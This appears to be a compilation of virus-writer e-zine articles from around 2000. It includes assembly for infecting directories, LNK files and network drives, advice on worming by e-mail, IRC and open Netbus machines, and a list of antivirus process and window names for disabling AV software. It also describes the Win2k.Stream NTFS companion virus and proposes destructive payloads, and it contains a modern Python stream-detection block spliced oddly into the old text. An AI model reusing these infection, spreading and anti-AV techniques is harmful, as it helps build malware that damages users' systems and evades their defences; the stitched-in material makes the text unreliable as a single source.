The FindNextFileProc and FindFirstFileProc are procedures that call the
matching APIs ( I think you'll also use them several times ).
The RandomNR procedure just generates a random number in dx.
************************
ParseFolder:
call InfectCurDir ; infect the current directory
cmp [ebp+InfCounter],0 ; check if we reached the number of files we want to infect
jbe EndParsing ; we infected enough ? ok, leave !
GetOtherDir:
; first of all we check if this
; is a valid directory
mov eax, dword ptr [ebp+WFD_dwFileAttributes]
and eax, 10h ; if not we get the next
jz NoThisOne ; one
NoThisOne:
; close Find-Handle
mov eax, dword ptr [ebp+FindHandle]
push eax
call dword ptr [ebp+XFindClose]
Folders db '*.',0
************************
The Windows Registry also offers us a lot of information about what files
or directories we should infect to be sure that our virus gets activated
again and does not sleep inside some never-used files. You need to load
an additional DLL in your virus, but I think this is ok. If you can't load
the DLL, just jmp over the registry routines and infect fewer files.
I think you all know what the Windows registry is, don't you? For those who don't:
the registry replaces the old ini files which were used in older versions
of Windows ( 3.1 ). The registry information is stored in User.dat and
System.dat. To view or change the registry use 'regedit.exe', which is delivered
with every version of Windows.
The following APIs are necessary to access the registry, they are all
inside ADVAPI32.DLL !
Ok, let's see some source for how to get a value from the registry :
This little piece of code gets the Start Menu folder
************************
WeFailed:
ret
************************
But what can we use the registry for ? Ok, let's see some interesting values :
Here are the paths of all installed apps, what about parsing this key ? ;)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
Shared files ( infect them "two for the price of one" *g* )
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs
Registered help files ( if your virus infects them, here you get a whole bunch of them )
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Help
Windows uses LNK files to create shortcuts for often-used files, so you
don't need to copy an 8 MB file to your desktop. If you find such
a link, you should check if it points to a file you are able to infect,
if so.. don't wait and drop your code over it.
This becomes very useful if you parse the Start Menu or the desktop *eg*
Here is some example code from my Win32.DDoS for how to do this, it does not
work with NT LNK files :( There is also an API we can use for this, but I
never figured it out, but I think this is not that much code, so we can
include it.
************************
; first of all, we check for the file
; mark, it is a single 'L' followed by a zero
LNKSearch: ; go on searching
dec esi ; we search until we found the dots or
loop CheckLoop ; searched the entire file ( size in ecx )
; I don't want to create a SEH .. ;)
; if we end here, we did not find the two dots.. :(
NoLNK:
6.) Worming
To make sure you don't stay on a single computer you should try to spread over
networks. One way are IRC worms, which send your virus to other chatting people.
To my mind this is the easiest way to worm around.
Another way is to check all drives and if you have access to a network drive,
infect some files there.
************************
WhatDrive:
push esi
call GetDriveType
cmp eax, DRIVE_REMOTE ; we got a network drive
jne NoNetwork
NoNetwork:
Call GetNextZero ; place esi after the next zero
; ( searching from esi onwards )
cmp byte ptr [esi],0
jne WhatDrive ; if we searched all drives we
; end here, otherwise we check the type
StopThis:
ret
Buffer db 60h dup (?) ; I don't know that many ppl with 20+
; Drives so this buffersize should be
; big enough ;)
************************
Another way is, like the 911 dialer does, to scan IP ranges when the user
is online for non-password-protected Netbus PCs. If you have access, just upload
your virus ;)
Finally, you can worm with the help of e-mails, infect a program and send
it around with the help of Visual Basic Script or with the MAPI commands. This
is maybe the fastest and most efficient way of spreading, because the snowball
effect is very huge. But if you use VBS and Outlook, please keep in mind that it
is bad enough that your virus just spreads on one OS, if it also relies on
two frontends ( OE and VB Scripting Host ) it becomes even worse ;)
Hope this little text helps at least some people, I enjoyed writing it, and hope
you do so too while reading it... ;)
cu SnakeByte
AV-List 13.07.2000 ( by SnakeByte [ SnakeByte@kryptocrew.de] )
What is the problem when using anti-AV tricks in a virus ? Most of those
you find in tutorials are simply outdated ( think of the F-Prot loop trick, which
is still used ;) But in Windows you have more possibilities to get rid of the AVs:
you can stop the execution of files ( under Win9x and 2k ), you can delete files,
you can prevent files from being executed ( if you're ring-0 ) and you can
close windows of other applications. So on this little list you find all you need for this.
I looked for such a list because I wanted to know which files are used by
AVs and which windows we should close to disable them ! But I found none,
lucky for you :
Now I have a CD in my hands with several shareware AVs and I collected several
others on the net ( god I love this flatrate ;) So I took myself some spare
time and made this little listing.
I just have Win95 so I can just give information about the Win9x versions.
If you have another version of a program which is listed here installed, or
information about a program which is not listed here, please contact me,
so I can expand this list and keep it up to date.
**************************************************************
Anti-Viral Toolkit Pro ( AVP )
Files:
*.avc Virus Database
( The Normal EXE Files seem to start the _ ones )
_avp32.exe AVP Antiviral scanner shell
_avpcc.exe AVP Control Centre Application
_avpm.exe AVP Monitor
avp32.exe AVP Scanner ( Main File )
avpcc.exe AVP Control Centre Application
avpm.exe AVP Monitor
avpdos32.exe AVP Scanner for DOS
avptc32.exe AVP Scanner for DOS
exec.exe unknown
avpupd.exe AVP Update ( leeches new *.avc files )
Window-Names:
AVP Monitor
AntiViral Toolkit Pro
AVP Updates
**************************************************************
AntiVir 9x
Files:
Antivir.vdf Virus Database
AVE32.exe Scanner ( DOS )
Avgctrl.exe Monitor
Avnt.exe Scanner ( DOS )
Avrep32.exe Report Viewer
AVSCHED32.exe Scan Scheduler
AVWIN95.exe Scanner
Avwupd32.exe Update
Windows:
H+BEDV AntiVir Guard/9x
AVWUPD32
**************************************************************
Dr. Solomon Virus Scan
Files:
scan.dat Virus Database ( assumed )
AVConsol.exe Scheduler
Bootscan.exe MBR-Scanner ( DOS )
ECEngine.exe Download Engine
FindViru.exe Scanner ( DOS )
scan32.exe Scanner
scrscan.exe ScreenSaver + Scanner
VSCAN40.exe Desktop for the Scanner
vshwin32.exe Monitor
Webscanx.exe Webscanner
Windows:
vsstat
Avconsol
Webscanx
Vshwin
**************************************************************
F-Prot for Windows
Files:
*.def Virus Database
Expert.exe Help & Information ( DOS )
FP-Win.exe Scanner
f-stopw.exe Monitor
Vir-help.exe Help-File ( DOS )
Windows:
FP-WIN
F-PROT für Windows ( German Version )
F-STOPW Version 5.06c
**************************************************************
F-Prot 3.07B
Files:
*.def Virus Database
F-prot.exe Scanner ( DOS )
**************************************************************
F-Secure Anti-Virus for Windows 95
Files:
*.avc Virus Database ( uses same as AVP ! )
DVP95.exe F-Secure Gatekeeper
DVP95_0.exe F-Secure Gatekeeper
F-agnt95.exe F-Agent
F-prot95.exe F-Secure Anti-Virus Launcher
Windows:
F-Secure Anti-Virus for Windows 95
F-Secure Anti-Virus
F-agnt95
Dvp95
**************************************************************
G-Data AntiVirenKit ( German Program )
Files:
*.avc Virus Database ( Same as AVP ! )
AvkServ.exe Scan Server
AckWin32.exe Scanner
notstart.exe creates Bootdisks
Windows:
AntiVirenKit 9
**************************************************************
InoculateIT Personal Edition:
Files:
Vet95.exe Scanner
VetTray.exe Monitor
AutoDown.exe Update
Rescue.exe Dos-Scanner
Window-Names:
InoculateIT Personal Edition
InoculateIT Real-Time Protection Status
vettray
AutoDownload
**************************************************************
Norman Virus Control Win 9x
Files:
Claw95.exe Monitor
Claw95cf.exe Configures Monitor
Normist.exe Smart Behaviour Blocker
Nvc95.exe Scanner
Nupgrade.exe Internet Upgrade
NVCbin.def Virus Database
NVCMacro.def Virus Database
Windows:
Norman Virus Control for Windows 95/98
Cat's Claw v4.80
**************************************************************
Norton Anti Virus ( NAV )
Files:
navapw32.exe Monitor
NavLu32.exe Update
Navw32.exe Scanner
Windows:
navpw32
Norton AntiVirus
**************************************************************
Sophos Anti-Virus for Win95:
Files:
VDL.dat Virus Database ( assumed )
Sweep95.exe Scanner
Window-Names:
Sophos Anti-Virus - SWEEP
**************************************************************
Trend PC-Cillin 98
Files:
IOMon98.exe Monitor
PCCWin98.exe Scanner
Windows:
Trend PC-cillin 98
Iomon98
**************************************************************
RAV 7
Files:
*.vdm Virus Database
Jedi.exe Scan Scheduler
Monitor.exe Monitor
rav7win.exe Scanner
rav7.exe Scanner ( DOS )
##############################################################
Are Anti-Virus Companies Criminals?
SnakeByte
Hi, maybe you are wondering about this headline, but I will tell you some facts which
brought me to this question ;)
The first thing is, that in several countries there is a law against the ownership of viral
source codes and binaries. But this also implies that it is forbidden to share these
things. What do AVers do ? They share their files so they are all able to include common
viruses in their databases. In addition to this, they have a lot of viral binaries and
disassemblies in their labs, to analyze viruses.
The next fact is not related to a country-specific law, but to international copyright. Most
of the software for MS-DOS and Windows ( which are the favourite platforms for viruses ) is
commercial. What does this mean ? You have to pay for the software you use. If you copy it
completely or parts of it without paying for the code, you break international copyright
laws. Heh, what do Kaspersky and the others ask me for ? I shall send them files which I
suspect to be infected ? I can't believe this, they ask me to commit a crime ! I don't know
how other countries handle this, but here in Germany if you make another person commit a
crime it is nearly as bad as committing the crime on your own.
Last time I installed something commercial on my PC, I was so bored that I read the
disclaimer ( you know, the window with lots of text you normally just see for a short time,
because you directly press >next< ). I was surprised when I saw the little paragraph about
reverse engineering. If you own this program, you agree to the terms that you will never
ever reverse this program. ( If you don't own the program you break the copyright I talked
about a few lines above *g* ). Heh, how do the anti-virus researchers analyze viruses ? They
reverse the virus, to get knowledge about how the virus works. Whoah, to do this, they also
need to disasm the infected program. Another law they break. I really don't think that they
just start the file to infect some goats, if they did, they would be in danger that new
hardware attacks destroy their systems ;)
Another thing is that several anti-virus companies start to work on scanners which run on
mail servers to stop outgoing viruses. The mail will not be delivered. Due to the fact that
most virus scanners can scan compressed files and so on, there is no easy way for a normal
user to send a virus to his favourite AV company if the webserver he uses has one of these
scanners running and the scanner has the virus inside its database. Ok, why is this so
criminal ? They exclude smaller AV companies from the market by this. I for myself write a
simple, free anti-trojan tool. How should I receive submissions from people who want to
support my work ? It is impossible and therefore I can no longer work on my product. By
this, they use their near-monopoly-like position to get rid of competitors. This is illegal,
as you see in the current proceedings against Microsoft.
What if we consider viruses to be an art ? In a way the author created something unique,
which may be assumed to be an artwork like a book or a painting ( if you look at abstract
artwork, nearly everything may be considered to be art *g* ). What about the destruction of
art ? Nearly everywhere this is illegal or at least against the ethics ( just think about
the burning of books by the Germans during WW2 ). So this might be another crime they
commit.
What if we placed a copyright in our software ? Something like: "You can freely
distribute this program, as long as you do not change anything. Disassembling and
forwarding to the anti-virus community is forbidden. This program is protected by
international law. It is just meant for analyzing artificial intelligence in controlled
environments. It is also strictly forbidden to place this program in a non-controlled
environment and release it into the wild.. bla bla" Just use their laws to forbid them
analysing our creations. If you see the virus in an AV database you know they have broken
this law and you can take them to court... ;)
1. Introduction
I just wanted to write an article about NTFS5. But I am reading a lot of
documentation about Win2k and I found there many functions and sequences that
could be very useful for us, virus coders. So I decided to write some tipz
and trix that anybody could use. I hope I succeeded.
btw It's my first article written in English so pls be patient. My English sux
so if you don't know what something means, just contact me.
And now we can begin ...
2. NTFS5
I think you all expected this:) And I also read on virus.cyberspace.sk that
an English version of my article for Igi is requested. I won't exactly translate
what I wrote there becoz it wasn't for coders. This will be :)
2.1. Streams
Streams are not a new feature of NTFS5; they have been implemented in NTFS since the
very beginning of WinNT (version 3.1) but have been downplayed by Micro$oft.
In Win2k the position of streams is much better. And there also exists the first
virus that uses streams. It's of course mine and Benny's/29a Win2k.Stream. I
think ya all have heard about it becoz of its big media success. It's a very easy
and simple virus with a good idea I think. First we heard about streams from a
man called GriYo/29a (heya and thx man!) at a meeting in Brno. And then when Benny
came to me for some days we decided to write our first common virus (and my
first). It was really funny becoz we coded through the nite and very late we
didn't even know what we were typing :) There also existed a version of
Win2k.Stream with a polymorphic stream name! But the next day when we woke up and
talked about it in the pub we decided to write it as simple as possible. And I
think we succeeded - the comment is longer than the whole code XD.
First we'll look at what streams exactly are and then we'll talk more about our
virus.
On filesystems such as FAT, FAT32 and others there exists only one unnamed stream.
What do ya think it is? Exactly! The file alone. But on NTFS there also exist
other (data) streams with a name. The name begins with ':' to indicate that it's
a named stream (part of the file) and is pasted together with the filename (the unnamed
stream). Look at this:
We have a file file.txt. It is also the unnamed stream. We would like to create
a new stream within the file file.txt. We want to name it "RAT" for example. So
we simply add ':' before the stream name and paste it to the file name. So now we have
somewhere in the buffer this: "file.txt:RAT". And now there's nothing easier than
just using CreateFile(A|W) to create our stream. If creation succeeds you will
get a handle that you can use as if it were a normal file (it is exactly a normal
file ...).
Well, we have a stream within the file but we forgot its name :) Any solution?
Yeah there is one. It's not as comfortable as it should be but there is. For
our needs we'll need a function called BackupRead that can be found in
kernel32.dll.
BOOL BackupRead(
HANDLE hFile, // handle to file or directory
LPBYTE lpBuffer, // read buffer
DWORD nNumberOfBytesToRead, // number of bytes to read
LPDWORD lpNumberOfBytesRead, // number of bytes read
BOOL bAbort, // termination type
BOOL bProcessSecurity, // process security options
LPVOID *lpContext // context information
);
For our purposes we can ignore such thingiez as security and context. hFile is the
handle to the file whose streams we want to enumerate. lpBuffer should point to a structure
called WIN32_STREAM_ID.
WIN32_STREAM_ID struc
DWORD dwStreamId;
DWORD dwStreamAttributes;
QWORD Size;
DWORD dwStreamNameSize;
WCHAR cStreamName[ANYSIZE_ARRAY];
WIN32_STREAM_ID ends
The first bytes of this structure represent the header of each stream. Then
begins the name of the stream and after the name there is the content of the stream.
To enumerate all the streams, you just need to loop until BackupRead returns
FALSE. Just look at the code snippet:
Well, I think that this is all you should know about streams for the beginning.
Just do some more coding with it and I think you will become more familiar
with it and you will use it in the future. Remember the words from Kaspersky/AVP:
Stream companion is a new breakthrough infection which is very hard to detect!
Just give the AVers some more wrinkles ...
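The other side of the BackupRead loop described above is the defender's: walking the same chain of WIN32_STREAM_ID headers to list the named streams a file carries and to spot a named stream that hides a PE image. The following is an added example, not Ratter's code; on Windows the buffer would come from BackupRead, here it is constructed inline from the structure layout the text gives.

```python
"""Walk a buffer in the layout BackupRead fills (a chain of WIN32_STREAM_ID
headers, each followed by its UTF-16 name and its data) and report named
alternate data streams. Added example; the sample buffers are constructed."""
import struct

# dwStreamId values from the WIN32_STREAM_ID documentation
BACKUP_DATA = 1             # the unnamed ::$DATA stream (the file itself)
BACKUP_EA_DATA = 2
BACKUP_SECURITY_DATA = 3
BACKUP_ALTERNATE_DATA = 4   # a named stream such as file.exe:STR
BACKUP_LINK = 5
BACKUP_PROPERTY_DATA = 6
BACKUP_OBJECT_ID = 7
BACKUP_REPARSE_DATA = 8
BACKUP_SPARSE_BLOCK = 9

# dwStreamId, dwStreamAttributes, Size (64-bit), dwStreamNameSize; cStreamName follows
HEADER_FMT = "<IIQI"
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 20 bytes


def parse_backup_streams(buf):
    """Return a list of (stream_id, name, data) for every stream in buf.
    Raises ValueError if the buffer ends inside a header or a stream body."""
    streams = []
    off = 0
    while off < len(buf):
        if len(buf) - off < HEADER_LEN:
            raise ValueError("truncated WIN32_STREAM_ID header at offset %d" % off)
        sid, _attrs, size, name_size = struct.unpack_from(HEADER_FMT, buf, off)
        off += HEADER_LEN
        # cStreamName is UTF-16LE and dwStreamNameSize counts bytes, not characters
        name = buf[off:off + name_size].decode("utf-16-le")
        off += name_size
        data = buf[off:off + size]
        if len(data) != size:
            raise ValueError("stream %r claims %d bytes, only %d present"
                             % (name, size, len(data)))
        off += size
        streams.append((sid, name, data))
    return streams


def is_well_formed(buf):
    """True if buf parses completely; a truncated or inconsistent chain gives False."""
    try:
        parse_backup_streams(buf)
        return True
    except ValueError:
        return False


def alternate_stream_names(buf):
    """Names of all named data streams (BackupRead reports them as :name:$DATA)."""
    return [name for sid, name, _ in parse_backup_streams(buf)
            if sid == BACKUP_ALTERNATE_DATA]


def executable_alternate_streams(buf):
    """Detection heuristic for the companion technique above: a named stream whose
    data starts with an MZ header is a hidden PE image, e.g. a displaced host in :STR."""
    return [name for sid, name, data in parse_backup_streams(buf)
            if sid == BACKUP_ALTERNATE_DATA and data[:2] == b"MZ"]


def build_stream(sid, name, data):
    """Encode one stream the way BackupRead would deliver it (sample construction only)."""
    name_bytes = name.encode("utf-16-le")
    return struct.pack(HEADER_FMT, sid, 0, len(data), len(name_bytes)) + name_bytes + data


# Constructed sample: a host whose unnamed stream now holds a virus body while the
# original program sits in a :STR stream, followed by the security descriptor stream.
SAMPLE_INFECTED = (
    build_stream(BACKUP_DATA, "", b"MZ\x90\x00 <virus body>")
    + build_stream(BACKUP_ALTERNATE_DATA, ":STR:$DATA", b"MZ\x90\x00 <original host>")
    + build_stream(BACKUP_SECURITY_DATA, "", b"\x01\x00\x04\x80")
)

# Constructed sample: a clean host with one harmless text stream (the file.txt:RAT idea).
SAMPLE_CLEAN = (
    build_stream(BACKUP_DATA, "", b"MZ\x90\x00 <program body>")
    + build_stream(BACKUP_ALTERNATE_DATA, ":RAT:$DATA", b"some notes")
)

if __name__ == "__main__":
    for label, buf in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        print(label, alternate_stream_names(buf), executable_alternate_streams(buf))
```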
2.1.1. Win2k.Stream
And now something more about our babe. After execution it tries to find victimz to
infect via FindFirst&FindNextFile. It infectz only *.exe files in the
current directory (there were no reasons to spread it). The infection worx as
follows:
so after infection the file loox like this (these are pictures from AVP :) -
left the clean file, right the infected one):
┌───────────────────┐ ┌───────────────────┐
│░░░░░░░░░░░░░░░░░░░│ │░░░░░░░░░░░░░░░░░░░│
│░░░░░░░░░░░░░░░░░░░│ │░░░ main stream░░░░│
│░░░░░░░░░░░░░░░░░░░│ │░░░ virus body░░░░░│
│░░░░main stream░░░░│ │░░░░░░░░░░░░░░░░░░░│
│░░░░░░░░░░░░░░░░░░░│ ├───────────────────┤
│░░░░program body░░░│ │░░░░░░░░░░░░░░░░░░░│
│░░░░░░░░░░░░░░░░░░░│ │░additional stream░│
│░░░░░░░░░░░░░░░░░░░│ │░░░░░░ :STR ░░░░░░░│
│░░░░░░░░░░░░░░░░░░░│ │░░░░░░░░░░░░░░░░░░░│
├───────────────────┤ ├───────────────────┤
│▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒│ │▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒│
│▒▒service streams▒▒│ │▒▒service streams▒▒│
│▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒│ │▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒│
└───────────────────┘ └───────────────────┘
then it tries to find the next file etc. At the end it just runs via CreateProcess
the <victim_file>:STR stream where the victim body is. When the victim ends it just
invokes ExitProcess and ends. If any error occurs it displays the following text:
and ends. This is also a payload on FAT, FAT32 and other filesystems that do
not support streams. And that's all. Simple, ain't it?
xor eax,eax
push eax
@pushvar <dd ?>
push eax
push eax
push 4
@pushvar <dd 1> ;default compression
push FSCTL_SET_COMPRESSION
push ebx ;NTFS compress it =
call DeviceIoControl ;mark as already infected
; = and save disk space :)
BOOL DeviceIoControl(
(HANDLE) hDevice, // handle to file
FSCTL_GET_COMPRESSION, // dwIoControlCode operation
NULL, // lpInBuffer; must be NULL
0, // nInBufferSize; must be zero
(LPVOID) lpOutBuffer, // output buffer
(DWORD) nOutBufferSize, // size of output buffer
(LPDWORD) lpBytesReturned, // number of bytes returned
(LPOVERLAPPED) lpOverlapped // OVERLAPPED structure
);
I think that it is clear. And also simple to implement in your virus. Just do it!
BOOL EncryptFile(
LPCTSTR lpFileName // file name
);
BOOL DecryptFile(
LPCTSTR lpFileName, // file name
DWORD dwReserved // reserved; must be zero
);
I think i'm repeating myself but - easy to implement, easy to use ...
BOOL DeviceIoControl(
(HANDLE) hDevice, // handle to a file
FSCTL_SET_SPARSE, // dwIoControlCode operation
NULL, // lpInBuffer; must be NULL
0, // nInBufferSize; must be zero
NULL, // lpOutBuffer; must be NULL
0, // nOutBufferSize; must be zero
(LPDWORD) lpBytesReturned, // number of bytes returned
(LPOVERLAPPED) lpOverlapped // OVERLAPPED structure
);
push 0
push 0
push CREATE_ALWAYS
push 0 ; create file SparseFile
push 0
push GENERIC_WRITE
@pushsz "SparseFile"
call CreateFileA
xchg eax, ebx
xor eax,eax
push eax
@pushvar <dd ?>
push eax
push eax
push eax
push eax ; Sign this file as a SparseFile
push FSCTL_SET_SPARSE
push ebx
call DeviceIoControl
push FILE_BEGIN
@pushvar <dd 8>
push 0 ; Move filepointer to 32GigaBytes
push ebx ; (hyea Gig :))
call SetFilePointer
push ebx ; SetEndOfFile ==
call SetEndOfFile ; fill with nulls to 32 gigz
push ebx
call CloseHandle
This code snippet will create a file whose size is 32GB! But actually the real
size on disk is zero :) Nice, ain't it ? And how do we let the filesystem know which
part of our file is sparse? Here's a prototype of the function that we can use ...
BOOL DeviceIoControl(
(HANDLE) hDevice, // handle to a file
FSCTL_SET_ZERO_DATA, // dwIoControlCode operation
(LPVOID) lpInBuffer, // pointer to FILE_ZERO_DATA_INFORMATION
(DWORD) nInBufferSize, // size of input buffer
NULL, // lpOutBuffer; must be NULL
0, // nOutBufferSize; must be zero
(LPDWORD) lpBytesReturned, // number of bytes returned
(LPOVERLAPPED) lpOverlapped // OVERLAPPED structure
);
2.4. Mounting
There's not so much to say about this theme. I think that most of ya know mounting from
various *nix systems such as Linux. If you want to set a volume mount point you will
need 3 functions.
That's all for now about NTFS5. There's more to say about each of the themes I
was talking about in this article but I think it is enough for the beginning.
Just code and study and if you have problems contact me. If I can help
you (== if I know it) I will help you.
First you must create a job object. This can be done via the CreateJobObject API function.
HANDLE CreateJobObject(
LPSECURITY_ATTRIBUTES lpJobAttributes, // SD (can be null for our purposes)
LPCTSTR lpName // job name (if null then job is
); // a noname job :))
So now we have created a job and we have a handle for it. Now we must assign some
process to it. Just use AssignProcessToJobObject ...
BOOL AssignProcessToJobObject(
HANDLE hJob, // handle to job
HANDLE hProcess // handle to process
);
Easy. Now we can place some restrictions on the processes within the job but
that's not so necessary for now. I promised terminating all processes via one
API function, right? Here it is ...
BOOL TerminateJobObject(
HANDLE hJob, // handle to job
UINT uExitCode // exit code
);
After calling this function with the right job handle, all processes within
the job will be terminated.
4. Otherz
- in Win2k the Toolhelp32 library is implemented. You can again use functions such as
CreateToolhelp32Snapshot, Process32First etc. It is very useful when
writing per(multi)-process residency for Win9x and Win2k. In WinNT you
could only use EnumProcesses and EnumProcessModules from psapi until now.
These two functions weren't in Win9x so there was duplicate code in viruses
for both operating systems.
- for easier access to the registry you can use functions from the Shell Light Weight
API (shlwapi.dll). These functions are:
SHDeleteEmptyKey
SHDeleteKey
SHDeleteValue
SHGetValue
SHSetValue
SHQueryValueEx
SHEnumKeyEx
SHEnumValue
SHQueryInfoKey
SHRegGetBoolIUSValue
e.g. to read a value from a subkey, you had to open the registry subkey, call RegQueryValueEx
and then close the registry key. SHGetValue does everything in one step.
- when you are infecting a file check it with SfcIsFileProtected which will tell
you whether the file is protected or not. (I'm writing an article about how to
fuck SFP and then it will be easier :))
- if you want to go to some system directories such as system32 etc. use the
function ExpandEnvironmentStrings which lets you use environment variables. E.g.
until now you had to get the Windows directory and then paste system32. But now
you just use the %system32% environment variable which you pass to Expand ... that
will return the expanded path.
DWORD ExpandEnvironmentStrings(
LPCTSTR lpSrc, // string with environment variables
LPTSTR lpDst, // string with expanded strings
DWORD nSize // maximum characters in expanded string
);
5. End
I need rest !!!
If you aren't crazy after reading this article then you are not normal :)
For such people a little song:
Do you know who sings this? It's my beloved song from my beloved group. If
you know the name of that group tell it to me on #virus and you will get a prize.
(well I still dunno what the prize will look like but you will :))
And that's all for now ... If you find any errors just contact me pls.
Thx for reading!
Kalkin/EViL
These are difficult times for us, virus writers. No, I don't mean the cops, society or the
press. I mean the process of writing a virus. Yes, there are tons of materials about this
subject and quite some people who can help, but that's usually with technical problems. What
if you want to do something radically new? It's actually not so easy coz everything has
already been done: polymorphic macro viruses, ACCESS infection, LINUX viruses. You can
realize some parts of the virus in a never-seen-before way, but these parts are mainly only
some solutions to some technical problems. But you want to do something NEW and
INTERESTING, something like the spying virus from CodeBreakers or the payload of CIH. Maybe
this article will help you.
Maybe this has already been done, but I haven't heard about it (on the other hand, I'm not
too informed about what goes on in the scene). Anyway, if it's so then the credit goes to
the one who had this idea.
As you all know, .LNKs are small link files, so-called shortcuts, that were introduced with
Windows 95 (in Microsoft's OS world) and were meant to eliminate the need to copy one program into
several folders. .PIFs are basically the same, except that they also contain useful loading
information and are for DOS programs. Both formats contain the path of the original program.
It wouldn't be hard to replace this path with the path to our infected file, which would
execute the real program after doing its own work. This would be a kind of companion
virus. It would be even better, because how many AV programs check for changes in .LNK/.PIF
files? Another plus is that this infection method basically works on every OS that has
something like .LNKs (symbolic links on Linux, for example). The only problem is that a virus which
uses just this method of infection won't spread to any other computer (it will "travel" only if
somebody for some reason copies our file to another PC). But this method can be used to
increase the chance of the virus being executed, especially in the case of runtime viruses.
Alias "infection"
This idea is based on the previous one and works on DOS (under 4DOS and NDOS) and, I think,
on *NIX systems. A virus could set some aliases pointing to itself and, after infecting some
files, execute the original program.
Name changing
What if a DOS virus hooks INT 21h, saves and then changes the name (set by exec, found by
findfirst) to the name of an infected file (in memory)? The infected file would be executed,
copied to disk, included in a ZIP archive. If the proper code is included then this viralized
item wouldn't be opened for editing (the real one would). A Windows virus could do the same.
And this method is better for spreading than the above two.
This idea was originally from MiKE The Hacker/TPT Gang and describes a hybrid virus that
infects formatting programs and modifies them so that they put the same virus on the
boot sector of every disk they format. This would be better than just a boot-sector infector,
because you can't get rid of the virus by re-formatting the disk (at least not with this
formatter). A reboot won't help either. This idea can be enhanced: infect CD-writing programs
so that an AUTORUN.INF and an infected file get written to every CD. It should be a little
bit easier (no need for a hybrid virus) and also better, because there's no way you can get
rid of the virus on a CD (unless you're burning CD-RWs). Disadvantage: quite a few different
formatting/CD-burning programs exist.
I came to this idea when I was surfing through Ralf Brown's Interrupt List. It says
that by using interrupt 15h and setting AX to D042h it's possible to install a microcode
patch into the Pentium Pro processor. I haven't checked this and have no idea how much the
patch can affect the CPU, so I don't know if the proper code would really fuck the processor
or do nothing at all. It's too bad there aren't so many Pentium Pros around, because there
seems to be CIH potential.
"Collection" viruses
This idea was inspired by GriYo/29A's SIMBIOSIS project. If you don't know what that is:
it combined a polymorphic virus with an Internet worm that contained an SMTP engine. A
so-called collection virus is a virus (or worm) that contains several (let's say 5) viruses
which are released in random order.
"Part-upgrading" viruses
Those viruses would carry a "serial number" for every part of themselves: the procedure for
finding files, the polymorphic engine, the infection part. When such a virus "meets"
another part-upgrading virus, it would check all serial numbers and, if some of them are
newer than its own, copy the updated procedure into itself. And when it finds a part
that it doesn't have, the virus would copy that part into itself and add a call or jump to
it. So basically these viruses expand themselves. A direct-action COM infector could for
example add to itself parts to go TSR and infect EXEs.
Quoting viruses
It's a lame and not new idea. Such a virus would, as its payload, display quotations from some
famous person, for example Socrates. The good thing is that there are MANY people who have
said something (I never said it should be something smart or meaningful).
Intro/demo viruses
I don't mean product demos here, but graphics demos like the ones presented at demo parties
and compos (check http://www.hornet.org to get the picture). Intro viruses would play such
video effects as payload. Advantages: usually small size, nice, different (what do you think,
will people remember better a lame text-mode "Infecto-ViruZ" in black and white, or an
"IntroVirus" in 24-bit colours accompanied by breathtakingly beautiful moving clouds?)
Most viruses today have retro abilities, but I'm talking about a virus that is specially
coded to destroy anti-virus programs. It would turn off resident AV monitors and install
trojans in anti-viruses (*.AVC and TBSCAN.DEF infection). It would also overwrite part of the
AV program by installing itself in it and then simulate that the AV is scanning. There are
several viruses that patched the "File system" status in TbScan's output to hide the fact that
it suddenly used DOS services to read the disk. A SAAV virus would for example execute
F-Prot/DOS's graphics procedure to display the message "Scanning for known viruses in memory",
but then just wait for some time. It would use the necessary procedure to bring up the
scanning window, display filenames and, instead of checking them, infect them. Or for example
display "Checking partition table" from ThunderByte Partition (created by TbUtil) and check
nothing. It would be like real AIDS, which doesn't kill by itself; it just destroys the immune
system and clears the way for other diseases. It doesn't take much code to do this, just
some small patches. The problem is how the virus finds what to patch, because AV companies
change the inner structure of the program with every new version. At this point the fact
that most AV programs don't let themselves be encrypted/compressed (because of the CRC check)
comes in really handy.
Simulating viruses
Based on the above idea, these viruses would install themselves in some specific programs and
then simulate them. One example could be PGP (so that the signature is always GOOD, and goodbye
to trustworthy software). It could also be one virus that patches several products.
"Expensive" viruses
It's actually an image of what happened here in Estonia: quite a few Internet users received a
file called Estonia.Exe. This was a SFX ZIP and contained a client program for some
sex server. Anyway, after executing it the program also did some other things, and as a result
the PC began to connect to the Net through a Malaysian (if I remember correctly) server, which
had quite high prices. Nobody knew it and everyone was REALLY surprised when at the end of
the month the telephone bill was HUGE. There was talk that this was a virus, but most
(including specialists) don't think so. It seems that it was just a trojan. But this idea
can be used in viruses (a good way to compromise the lamest ISP near you).
And lastly, a destructive payload from KUTT/TPT Gang. The idea is based on the fact that
speakers may get damaged when the music is too loud. KUTT thought that it would be
interesting if a virus did that to the PC speaker: generate a high and loud sound and play it
for quite some time. It's probably technically impossible to realize, but who knows? An
enhanced version of this idea is to damage the speakers connected to the sound card. This
should actually be more realistic, because usually the hardware of a sound card is capable of
that and the speakers aren't made for this situation.
The protector scene
Kalkin/EViL
There are many sub-cultures in the computer world: hackers, demo-coders, musicians,
graphicians, virus authors, crackers. And there's also a not so well known scene: the
protector scene. It mostly consists of crackers. So what do these protector guys do? They
research ways to defeat debuggers/code analyzers/emulators/disassemblers and write
programs that use these ways to protect COM and EXE files. Why am I telling this? Because
there's been quite some talk about anti-bait techniques, the advantages of slow polymorphism
and other ways to make the detection and/or disinfection of a virus harder. But almost nothing
has been said about anti-debug tricks, even though those are REALLY important. Already in
number 4 (or was it number 6?) of 40hex there was an article about AD (anti-debug) code. The
samples there were for confusing the reading of code. But the methods have evolved FAR beyond
that. Nowadays the protecting part uses stack tricks to crash debuggers, switches between
protected and real mode, checks memory, calculates checksums, debugs and emulates itself,
relocates the code in memory, opens the original file and checks it for changes. The
protectors contain polymorphic engines (I've seen all the better-known MTEs in them: TPE,
ViCE, MtE, DAME, etc.). They have become really powerful. But they still resemble viruses:
get executed first, do their stuff, clean up, execute the real program. Some of these
